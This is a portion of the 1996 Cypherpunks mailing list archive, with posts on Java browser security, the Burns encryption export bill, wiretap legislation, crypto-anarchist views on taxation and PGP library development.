> Perry E. Metzger wrote:
> > Netscape with Java cannot be so tested because important components
> > come down off the net.  So no, I'm not holding Netscape with Java to a
> > higher standard. I'm very much holding it to the same standard.
> 
>   The Netscape Administration Kit will allow a site security admin
> to create a configuration that disables Java, and does not allow the
> user to enable it.  If your customers require netscape, perhaps this
> is an option that will make you more comfortable.

It certainly makes me feel more comfortable. The problem I have is
that I expect that increasingly pages will arise for which information
can only be extracted with the use of Java. Some flunky from some desk
will will come up and scream "what do you mean I can't get a copy of
Foo Corporation's merger press release because we won't run some
program! Thats bullshit! Do you know how much money the risk arb desk
pulls in, you twit! This must never happen again! Fix it immediately!"

Luckily things aren't quite at that stage yet, but its only a matter
of time. When you create a tool like this, you have a certain degree
of, dare I say it, community responsibility. Once you've hyped the
tool enough and made it ubiquitous, people at some point are going to
claim that they *need* it, at which point the security people have no
choice but to do something that gives them nightmares.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com
Date: Sat, 4 May 1996 04:32:37 +0800
To: cypherpunks@toad.com
Subject: Dole Backs Crypto Export
Message-ID: <199605031309.JAA16482@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, May 3, 1996, p. 7.


   Dole backs removal of software export ban

   By Louise Kehoe in San Francisco


   Senator Bob Dole, the presumptive Republican presidential
   candidate, yesterday threw his support behind proposed
   legislation to remove US export restrictions on computer
   software used to encode Internet messages.

   The new Security and Freedom through Encryption bill
   introduced yesterday by several Republican senators and
   congressmen, also rejects a controversial Clinton
   administration proposal to enable law enforcement agencies
   to unlock encoded electronic messages.

   For Senator Dole, the encryption bill provides an
   opportunity to seek support from Silicon Valley high-tech
   leaders many of whom backed Mr Bill Clinton in 1992, and to
   boost his election campaign efforts in California.

   "The administration's misguided proposal on encryption
   amounts to a pair of cement shoes for Silicon Valley," said
   Senator Dole. "It seems to me that a new pair of track
   shoes might be a better answer. The administration's big
   brother proposal will literally destroy America's computer
   industry," he said.

   Encryption software is currently classified as "munitions"
   and exports are strictly limited by the US state
   department. US and other western intelligence and law
   enforcement agencies are opposed to the commercial use of
   the most powerful encryption methods which they argue could
   be used to mask criminal or terrorist activities by
   effectively preventing wire-taps.

   However, US software companies maintain that the current
   export restrictions threaten US pre-eminence in the world
   software market.

   A study by the Computer Systems Policy Project, a computer
   industry group, estimated that within four years the US
   economy would lose $60bn in revenues and roughly 216,000
   jobs as a result of encryption export controls.

   Moreover, current regulations, which allow export only of
   "weak" encryption, are unacceptable because such encoding
   has been demonstrated to be ineffective.

   Last year, for example students in France were able to
   break encryption which is used in the export version of
   Netscape Communication's popular Internet browser software.

   The limited availability of strong encryption software is
   also blocking the progress of electronic commerce on the
   Internet, US computer experts argue, because companies and
   individuals are reluctant to make electronic payments over
   the Internet without assurance of security.

   -----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 4 May 1996 09:44:18 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: proposed anti-pseudospoofing law in Georgia
In-Reply-To: <199605021952.MAA18471@netcom16.netcom.com>
Message-ID: <199605031638.JAA24955@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	"anti-psuedospoofing".
	He really has given up pretending not to be detweiler.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 4 May 1996 07:17:18 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605031414.KAA32390@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I must *try* to quit rising to all this bloody bait, but:]

Michael Loomis wrote:

>[..."unfairness is kept within reasonable bounds"..."reasonable
> sized government"...]

I'm sure that we all agree on the meaning of the term, "reasonable."

>Consumption taxation would, of course,
>include a tax on the amount of information coming into your computer.  I
>don't think that the government will have any problem determining the
>quantity of the information & since it will be encrypted anyway, I don't
>see the privacy worries.

This would give a whole new meaning to the term "mailbomb," no?
JMR

Regards, Jim Ray <liberty@gate.net> 

"The FAA, FBI, Customs, CIA, Justice, DEA and the IRS were all involved
 in Mena. They won't say how they were involved, but they will tell you
 there is nothing there." -- Bill Plante, CBS News Correspondent, &
 Michael Singer, Producer, CBS News, New York. in Tuesday, May 3,
 1994's  Wall Street Journal letters to the editor section.
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMYoTt21lp8bpvW01AQE4WQP+KQyztz4V6jfYvboOrDhLLuItlTzkLmIv
6TfM3/7O+fLoNcyKXGOEmgc5y7j0/IiiXJJtMsDCsfH/ONpyEAY1GRnfREgMv9HW
OezSVVhYd/xoKg6pouAaWgZ2cD3RlH8SeE7LqCkeZhAXdcXHiNIAK8mAv78Eln0y
KjzImXWG9dw=
=ieam
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 4 May 1996 15:48:08 +0800
To: cypherpunks@toad.com
Subject: e$: The Wealth of Nation-States
In-Reply-To: <Pine.SUN.3.93.960502012945.614A-100000@polaris.mindport.net>
Message-ID: <v0300661eadafb09fa31b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:05 AM  -0400 5/3/96, Michael Loomis wrote:
> No tax system will ever been perfect, but  income taxation is a good
> system of taxation.  Income taxation inevitably requires some accounting
> costs, but these costs should be going down with advances in computing
> technology and other technology.

Cashflow taxation, like the income tax, is a good *industrial* system of
taxation. It operates very well in the hierarchical communications network
of an industrial economy, especially in a world of expensive automated
processors. It favors unsecure transactions on secure, closed networks.
SWIFT (the interbank funds transfer system), NASDAQ (the "over-the-counter"
equity market system), and NIDS (the old National Institutional Delivery
System, where institutional trades were settled), are all just closed
networks, "clubs" as Eric Hughes calls them. Expensive bulletin boards.

However, in a world of ubiquitous, exponentially increasing semiconductor
switches of financial information, all using strong cryptography on
geodesic public networks, you get the virtual end of intercompany
book-entry transaction processing. Instead of swapping book-entries across
secure links, economic entities will eventually trade using anonymous
digital bearer certificates across insecure links, usually in an auction
market of some kind, settling all of their transactions for cash at the
time of the transaction.

It's economics, actually. As Moore's law progresses, the size of a given
economic entity, especially the financial intermediaries responsible for
underwriting and clearing certificates, gets increasingly smaller, until
someday it's an automated bot of some kind. At the same time, the cost of
maintaining a spaghetti-bowl of audit trails between all of those entities
becomes increasingly harder to sustain, and not just in computing
resources. It's also in time value of money. You collect the time value of
your money while it's "in transit": while it's actually sitting in your
bank account waiting to be paid to the other party of a trade. Unpaid
bills, check float, and unrevolved monthly credit card balances are all
good examples of this. As financial entities get smaller, more ubiquitous,
and more competitive, margins shrink and this becomes much more important.
Kind of like gravity and mass. Insignificant at one size, virtually the
only force at the other extreme of the scale. Because it settles instantly,
without any float, cash literally becomes king in this environment.

All of this is just as well. Strong cryptography makes the point moot.  Not
only do you have internet-level anonymizing protocols, but you also have
the certificate protocols themselves. You can't know who you're doing
business with, anyway.

When you don't have book-entries (cashflows) to tax, you can't tax
book-entries, which means nation-states can't have income, value-added,
sales, excise, import, export, or any other transaction tax, because they
just can't see any of those transactions behind a wall of strong
cryptography.

Fortunately, the nice thing about these certificate-based technologies is
that as they become more prevalent, the need for nation-states to apply
force to guarantee the honesty of the trading parties diminishes. The need
for force doesn't go away; physical security is always necessary, just like
air is. However, it is no longer so necessary to use it to deal with
repudiated trades in a large number of markets, especially those for money
and information.

At the transaction level, the protocol breaks if the requisite conditions
of the transaction aren't met. At the relationship level, if someone
repudiates a trade, they can be shunned. As Moore's law collapses the size
of the trades themselves, the abundance of competing entities in a given
certificate-based market reduces the risk of repudiation point-failure in
that market effectively to zero. Which means, you don't have to pay Uncle
to keep trading partners honest anymore. Which, as we saw before, is a good
thing, because you couldn't find them, anyway. ;-).

Given that the modern nation-state is a hierarchical industrial
organization anyway, -- a literal "force trust", to misapropriate ninteenth
century parlance -- it seems that its inability to finance itself in a
geodesic market seems inevitable. Competitive markets for all the services
it performs will eventually emerge.

We live in interesting times.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick May <pjm@spe.com>
Date: Sat, 4 May 1996 10:34:47 +0800
To: cypherpunks@toad.com
Subject: SF South Bay: So WhoWhere wants to meet with people interested in online privacy and security...
In-Reply-To: <Pine.GUL.3.93.960502184852.13717T-100000@Networking.Stanford.EDU>
Message-ID: <199605031729.KAA00641@gulch.spe.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves writes:
 > For a good demonstration of why WhoWhere? is not necessarily the greatest
 > thing since spice racks, look up "Louis Freeh," "Fuck You,"  "Asshole,"
 > "System Privileged User," and "Stephen Hawking." I keep telling them that
 > they'd better remove this last, but they don't consider it a priority.

     If you want further evidence of their technical skills, look up
my name.  I'm responsible for the corp@spe.com account.  WhoWhere has
therefore decided that I am responsible for every "corp" account in
their database and has attached my name to each and every one.  I
informed them of this several weeks ago but they are evidently not
interested in cleaning up their service.

     Being both socially and technically challenged, perhaps they want
your Fucking Statist input on obtaining a government grant for a
clue-free business.

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Sat, 4 May 1996 07:54:43 +0800
To: abd@cdt.org
Subject: Re: Burns Bill
Message-ID: <v02140b03adafc7fe0ee4@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> A quick read thru the text of the bill (via http://www.cdt.org/crypto/)
> shows none of the principle objectionable features of the Lehey bill.
> (Standards for key escrow agents, and additional criminal penalties for
> using encryption to hinder an investigation.)
>
> This bill has some obscure, to me, exceptions.  The most troubling of which
> I think means (IANAL) that export can be restricted if there is a
> reasonable expectation that the hard/software will be reexported to one of
> the countries on the extreme bad boys list.

I will point out that as things stand under U.S. law you aren't even
allowed to export toilet paper if the expectation is that the ultimate
customer is on the extreme bad boys list. Although as a libertarian I
find any such provision distasteful I cannot see that we are badly off
if the rules for exporting crypto and exporting toilet paper are
roughtly similar.

> in any case, it is not clear how passage of the bill could possibly
> make things worse.

I think that is key.

Perry

* PROTECT THE INTERNET AND THE FUTURE OF FREE SPEECH IN THE INFORMATION AGE *
      Join the legal challenge against the Communications Decency Act!
               For More Information, Visit the CIEC Web Page
                         http://www.cdt.org/ciec/
                       or email <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
                                                       (v) +1.202.637.9800
PGP Key via finger                                     (f) +1.202.637.0968
http://www.cdt.org/
http://www.cdt.org/homes/jseiger/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 4 May 1996 15:20:55 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <ElWSW6y00iWWM1ZWIa@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960503110332.20948B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Michael Loomis wrote:

> circumvent consumption taxation.  Consumption taxation would, of course,
> include a tax on the amount of information coming into your computer.  I
> don't think that the government will have any problem determining the
> quantity of the information & since it will be encrypted anyway, I don't
> see the privacy worries.

Traffic analysis (though remailers would help).

And what about mailbombing? If you're mailbombed, does your tax bill
skyrocket?

I think information has to be free (of tax, anyway), because there is no
way to prove the utlility of information.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Sat, 4 May 1996 14:09:59 +0800
To: cypherpunks@toad.com
Subject: L. Detweiler is a CyberAngel
Message-ID: <199605031809.LAA21643@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


ROTFL. From 
http://snyside.sunnyside.com/cpsr/nii/cyber-rights/Library/Announcements/CyberAngels-Safesurf

Special mention must go to an ongoing debate about anonymous remailers, which
was an area where we were less informed.  Thanks to  an154280@anon.penet.fi
 for lots of very helpful suggestions.  For those of you interested in the
debate about anonymity we have two suggestions:  firstly we have a HUGE FAQ
on "Identity, Privacy and Anonymity on the InterNet", written by L.Detweiler,
and if any of you want it, please write to us and ask for it (WARNING it is
138k!)  Secondly you can write to help@anon.penet.fi for their FAQ on their
anonymous service, which is also very educational.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack P. Starrantino" <jpps@voicenet.com>
Date: Sat, 4 May 1996 07:36:43 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
In-Reply-To: <adaea4ac18021004fc68@[205.199.118.202]>
Message-ID: <199605031509.LAA12680@omni2.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

> Unless the information is "secret," why bother? ...

I think its worth the bother as a necesary step in the process of making
email match people's naive expections: that they are sending sealed
letters, not postcards. I think it's particularly valuble in this case
to reinforce the point in the Senator's mind that some of us want
envelopes for our email, and that we require the technology needed to
acomplished this.

jps
--
Jack P. Starrantino   jpps@voicenet.com   http://www.voicenet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 4 May 1996 14:39:39 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <199605031825.LAA16991@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:03 AM 5/3/96 -0400, Perry E. Metzger wrote:
>... The problem I have is
>that I expect that increasingly pages will arise for which information
>can only be extracted with the use of Java. Some flunky from some desk
>will will come up and scream "what do you mean I can't get a copy of
>Foo Corporation's merger press release because we won't run some
>program! Thats bullshit! Do you know how much money the risk arb desk
>pulls in, you twit! This must never happen again! Fix it immediately!"

Unfortunately the market decided that function and price were more
important than security.  (I know, I spent 10 years developing and trying
to sell an OS with strong security features.)  The only thing I can suggest
to you is, spend the bucks, desk real estate, confusion etc. and have two
machines; a secure/reliable one and an insecure/unreliable one.  Make sure
OS manufacturers like Apple and Microsoft know that you want to be able to
disable the build in Java they have announced.

You may be able to develop a way of transferring the clipboard between the
machines so the dancing Java displayed economic numbers can be easily and
safely transferred to the secure machine's analysis program.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 4 May 1996 13:49:58 +0800
To: Michael Loomis <cypherpunks@toad.com
Subject: [RANT]Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605031826.LAA17003@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:05 AM 5/3/96 -0400, Michael Loomis wrote:
>No tax system will ever been perfect, but  income taxation is a good
>system of taxation.  Income taxation inevitably requires some accounting
>costs, but these costs should be going down with advances in computing
>technology and other technology...

My principle objection to the income tax is not the money, but the
bookkeeping.  When I am earning the money to pay my taxes, at least I am
working at jobs that maximize my enjoyment and earnings.  When I do the
bookkeeping, I am doing a job I hate.  (I'd rather be digging out septic
tanks.)  I have no choice but to do that job.

Fortunately, I have a wonderful wife who does the bookkeeping.  However,
come tax time, she spends far too many evenings and weekends glued to the
bookkeeping.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brerrabbit@alpha.c2.org
Date: Sat, 4 May 1996 12:22:32 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605031831.LAA15730@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sandy Sandfort <sandfort@crl.com> wrote:
>A couple of generations ago, only multinationals and the super
>rich could avail themselves of offshore banks, asset protection
>trust, foreign incorporation, etc.  Fifteen years ago, I was 
>helping members of the upper middle class do the same think.
>
>Today, virtually anyone on this list can afford these techniques.
>Non-US people have been using them for years.  The reason middle
>class Americans aren't savvy that yet are ignorance and inertia.  
>Everyday, Americans are becoming less parochial (due in part,
>ironically, to government hysteria about money laundering) about
>such possibilities.  As the Clintons and Doles turn up the tax
>and regulatory heat, they will also overcome their inertia.  

Do tell.  How would someone, just for instance, who is considering
leaving a "permanent" job for the higher compensation available to
contractors and consultants be able to structure a business in such a
way as to benefit from these techniques?  If we assume a rate of
between $60/hour and $125/hour (typical in Boston, New York, and the
Silicon Valley), how much can one save?  How much effort and money is
required?  How much risk is involved?

There are many books on the shelves claiming to show how to avoid
taxes using these techniques.  Most of them have the smell of
"dangerous crackpot" about them.  Can you recommend any in particular?

If this is too far off topic for cypherpunks I'd be interested in
learning of a more appropriate forum.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYpJ68NGLex6dhF9AQHKLgQAh2/j23rG3RP0VFNVcsNIUphgWjTG0mlE
ojXWJ29el616YCfKHpwXzT2v9+wThdQByp047qf8zXGqsjuf5ld2rkWxgap840JH
S4Wf1GkxdcCFM9Vq3Ks955YtWdWIz4PrngxEpPU6lmXTIY2Vk17HTRJoZBKJLwW0
iAPchDVd+kg=
=7bKv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 12:43:47 +0800
To: cypherpunks@toad.com
Subject: Why Leahy is No Friend of Ours
Message-ID: <adaf989101021004d99d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:34 AM 5/3/96, Black Unicorn wrote:
>On Thu, 2 May 1996, Timothy C. May wrote:

>> I'd say it's 99.95% likely that the PGP key was generated by a staffer--the
>> resident e-mail geek--and that only staffers know how to use PGP. (In fact,
>> probably only the one staffer who generated the key and knows the
>> passphrase....)
>
>While I believe this correct, it's worth noting that Leahy is fairly
>"into" the technology.  He finds it entertaining and "fun."  All of this
>mostly thanks to his one time counsel John Podesta.  Thanks Mr. Podesta!
>
>He's one of the more interested congress critters.
>
>> So, what is accomplished except "feel good" thoughts?
>
>Admittedly, not much.  I'm at least pleased he has a decently on the ball
>staff however who can tell him what the issues are.


"Decently on the ball"? I hope you are being ironic.

Leahy is no friend of ours. Recall that he chaired the hearings on the
FBI's "Digital Telephony" massive wiretap proposal, and co-sponsored the
legislation (with former FBI agent Don Edwards).

This "sleeping giant" of legislation is still out there, and has not been
consigned to the junk heap. It becomes operative--that is, the $10,000 per
day penalties for noncompliance with the law mandating telecom systems be
DT-compliant--in October 1997. (There is ongoing discussion of whether the
$500 million to be paid to the phone companies is going to be allocated,
and whether those companies (such as "Tim's Cheap Internet Phone Company")
which fail to get some of this lucre as it is handed out are then
exempt....the consensus seems to be that some of the $500 million will be
allocated as a sop to the phone companies, but that large numbers of
smaller companies will still be expected to be compliant when a wiretap
order is presented to them. This even if they never got a dime.

The implications for the Internet and for increasingly popular "Internet
phone" systems are interesting. As I understand the DT language, such
systems would have to be made compliant with wiretap requests, or face the
$10K/day penalties. This could force many ISPs, in the U.S. of course, to
take steps to immediately restrict certain programs, or even
[speculatively] force them to become compliant by some form of key escrow,
where they would keep a copy of a key for presentation to law enforcement.
[More speculation by me: the combination of the Wiretap Act, the
Anti-Terrorism Act, and the still-ongoing work on key escrow (TIS is still
pushing their system, Lotus hasn't backed down, Denning still says it's
needed, etc.) could mean that ISPs move to restrict use of crypto in
various ways, possibly mandating escrowed encryption.

Several of us (Black Unicorn, Duncan Frissell, me, etc.) may point out the
practical difficulties involved in such enforcement, and the longterm dim
prospects for success. But the fact is that ISPs are a kind of "choke
point" for halting certain things. I have a feeling I know what my ISP will
say if he gets a court order and a $10,000 per day penalty faces him. Those
who access the Net directly, through their own companies and/or by having
boxes hanging directly on the Net, will be less vulnerable to this kind of
pressure. But the Netcoms, PSI, Earthlinks, AOLs, and such will likely run
into  trouble the first time a court order is presented to make certain
Internet phone conversations tappable....

(I have long argued for this view that certain "choke points" will be
identified. These are the points of leverage--often companies--which law
enforcement can lean on. Whit Diffie made similar points a few years ago,
that drug laws were "enforced" inside companies (who previously didn't care
whether employees smoked dope on their time off, so long as they did the
job), with urine tests, threats of civil forfeiture of company assets if
even small amounts of drugs were found in the possession of employees, etc.
The "War on Drugs" effectively pressed companies into service as soldiers.)

Sure, a few services will decide to fight such penalties in court and seek
to have Digital Telephony thrown out in court. Deep pockets will be
required. Maybe they'll prevail. Maybe the Burns Bill will collide with
Digital Telephony. Unclear at this time.

But no Congressman who co-sponsors such legislation as the "National
Wiretap Initiative," with its "1% of the engineering capacity" requirements
and other such Big Brother Surveillance State clauses, is a friend of ours.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 13:47:11 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <adafa27e020210042ed7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 5/3/96, nmunro@technews.com wrote:
>subsribe neil
>munro

OK, I will "subsribe" you.

On the off chance that you meant "subscribe", instructions follow at the
end of this message.

The Cypherpunks list is handled with the "Majordomo" automated list
handler. All commands must be addressed to  majordomo@toad.com, not to the
readers of the Cypherpunks list.

How to subscribe to the Cypherpunks mailing list: send a message to
"majordomo@toad.com" with the body message "subscribe cypherpunks". To
unsubscribe, send the message "unsubscribe cypherpunks" to the same
address. For help, send "help cypherpunks".  Don't send these requests to
the Cypherpunks list itself. And be aware that the list generates between
40 and 100 messages a day.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 4 May 1996 13:25:47 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <v02120d09adb0070b090c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:37 5/2/96, Jeff Weinstein wrote:
>Perry E. Metzger wrote:
>> Netscape with Java cannot be so tested because important components
>> come down off the net.  So no, I'm not holding Netscape with Java to a
>> higher standard. I'm very much holding it to the same standard.
>
>  The Netscape Administration Kit will allow a site security admin
>to create a configuration that disables Java, and does not allow the
>user to enable it.  If your customers require netscape, perhaps this
>is an option that will make you more comfortable.

Does it prevent the user from downloading an unrestricted copy from
Netscape's ftp site or installing one brought from home?


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nmunro@technews.com
Date: Sat, 4 May 1996 15:42:53 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605031559.LAA26245@relay1.smtp.psi.net>
MIME-Version: 1.0
Content-Type: text/plain


subsribe neil 
munro




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Sat, 4 May 1996 02:20:35 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: PGP API & PGP 3.0
Message-ID: <01BB38EE.654DF3C0@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


I'm considering the use of PGP for bank operation in central Europe (and yes, also in France, but there -normaly- only for interbank fund transfers).
I have seen the PGP API stuff, but I don't know where and I haven't seen any commentaries by users.
I don't know the current state of the PGP 3.0 effort and the intermediate results, nor the respective relation of PGP API and PGP 3.0 (which has also an API).
Thanks for your advice,
Jean-Paul

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet, Communication, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sat, 4 May 1996 09:15:09 +0800
To: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Subject: Re: PGP API & PGP 3.0
In-Reply-To: <01BB38EE.654DF3C0@JPKroepsli.S-IP.EUnet.fr>
Message-ID: <9605031622.AA27676@bart-savagewood.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The PGP Library is currently under development.  I have a draft API
document, but it is not complete (I still need to finish documenting
the key management functions).  I'd like to get it to a state where I
can "publically" release it soon -- then again I've been saying that
for a while.

If you have more questions, you can contact me personally via email.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 4 May 1996 13:19:13 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <v02120d09adb0070b090c@[192.0.2.1]>
Message-ID: <199605031937.MAA10801@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Does it prevent the user from downloading an unrestricted copy from
> Netscape's ftp site or installing one brought from home?
> 

	No, but that's what policies like "We find Netscape 2.0 on
your machine and you are fired the next day" are for.
	(I know of one major silicon valley computer manufacturer with
such a policy. Others probably exist as well.)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sat, 4 May 1996 10:19:31 +0800
To: "Sally D. McMillan" <ids@uow.edu.au>
Subject: Here is some E-Commerce Info.
Message-ID: <9605031640.AA16752@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 PM 5/2/96 EDT, Sally D. McMillan wrote:
>I am writing a paper on electronic commerce, and I wonder if anyone happens to
>know of interesting URLs addressing the subject, including security issues?
>If you know of a good location for electronic commerce/security information,
>please email me directly
>at the following address:
>103007.3426@compuserve.com
>THANKS A LOT!! Sally

        Tons of it on every topic:

http://ccs.mit.edu/15967/groups.html
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 4 May 1996 15:33:10 +0800
To: sameer@c2.org
Subject: Re: proposed anti-pseudospoofing law in Georgia
In-Reply-To: <199605031638.JAA24955@atropos.c2.org>
Message-ID: <199605032000.NAA22247@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>	"anti-psuedospoofing".

pardon me, I thought that was the correct term. I saw someone
like Hal Finney or TCM (PM? EH?) use it here as I recall. 
it's hard to remember. if there is a more correct term I will
be happy to use that in the future.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 4 May 1996 13:14:18 +0800
To: cypherpunks@toad.com
Subject: Re: Conrad_Burns@burns.senate.gov: Open Letter to Internet  Community From Senator Burns
Message-ID: <2.2.32.19960503200718.00724dc4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 5/3/96 -0500, John Deters <jad@dsddhc.com> wrote:
[snip]
>I agree that this could be the single most important piece of legislation to
>affect the cypherpunks ever -- firmly defining the legal status of
>encryption (and in our favor, no less!)
[snip]

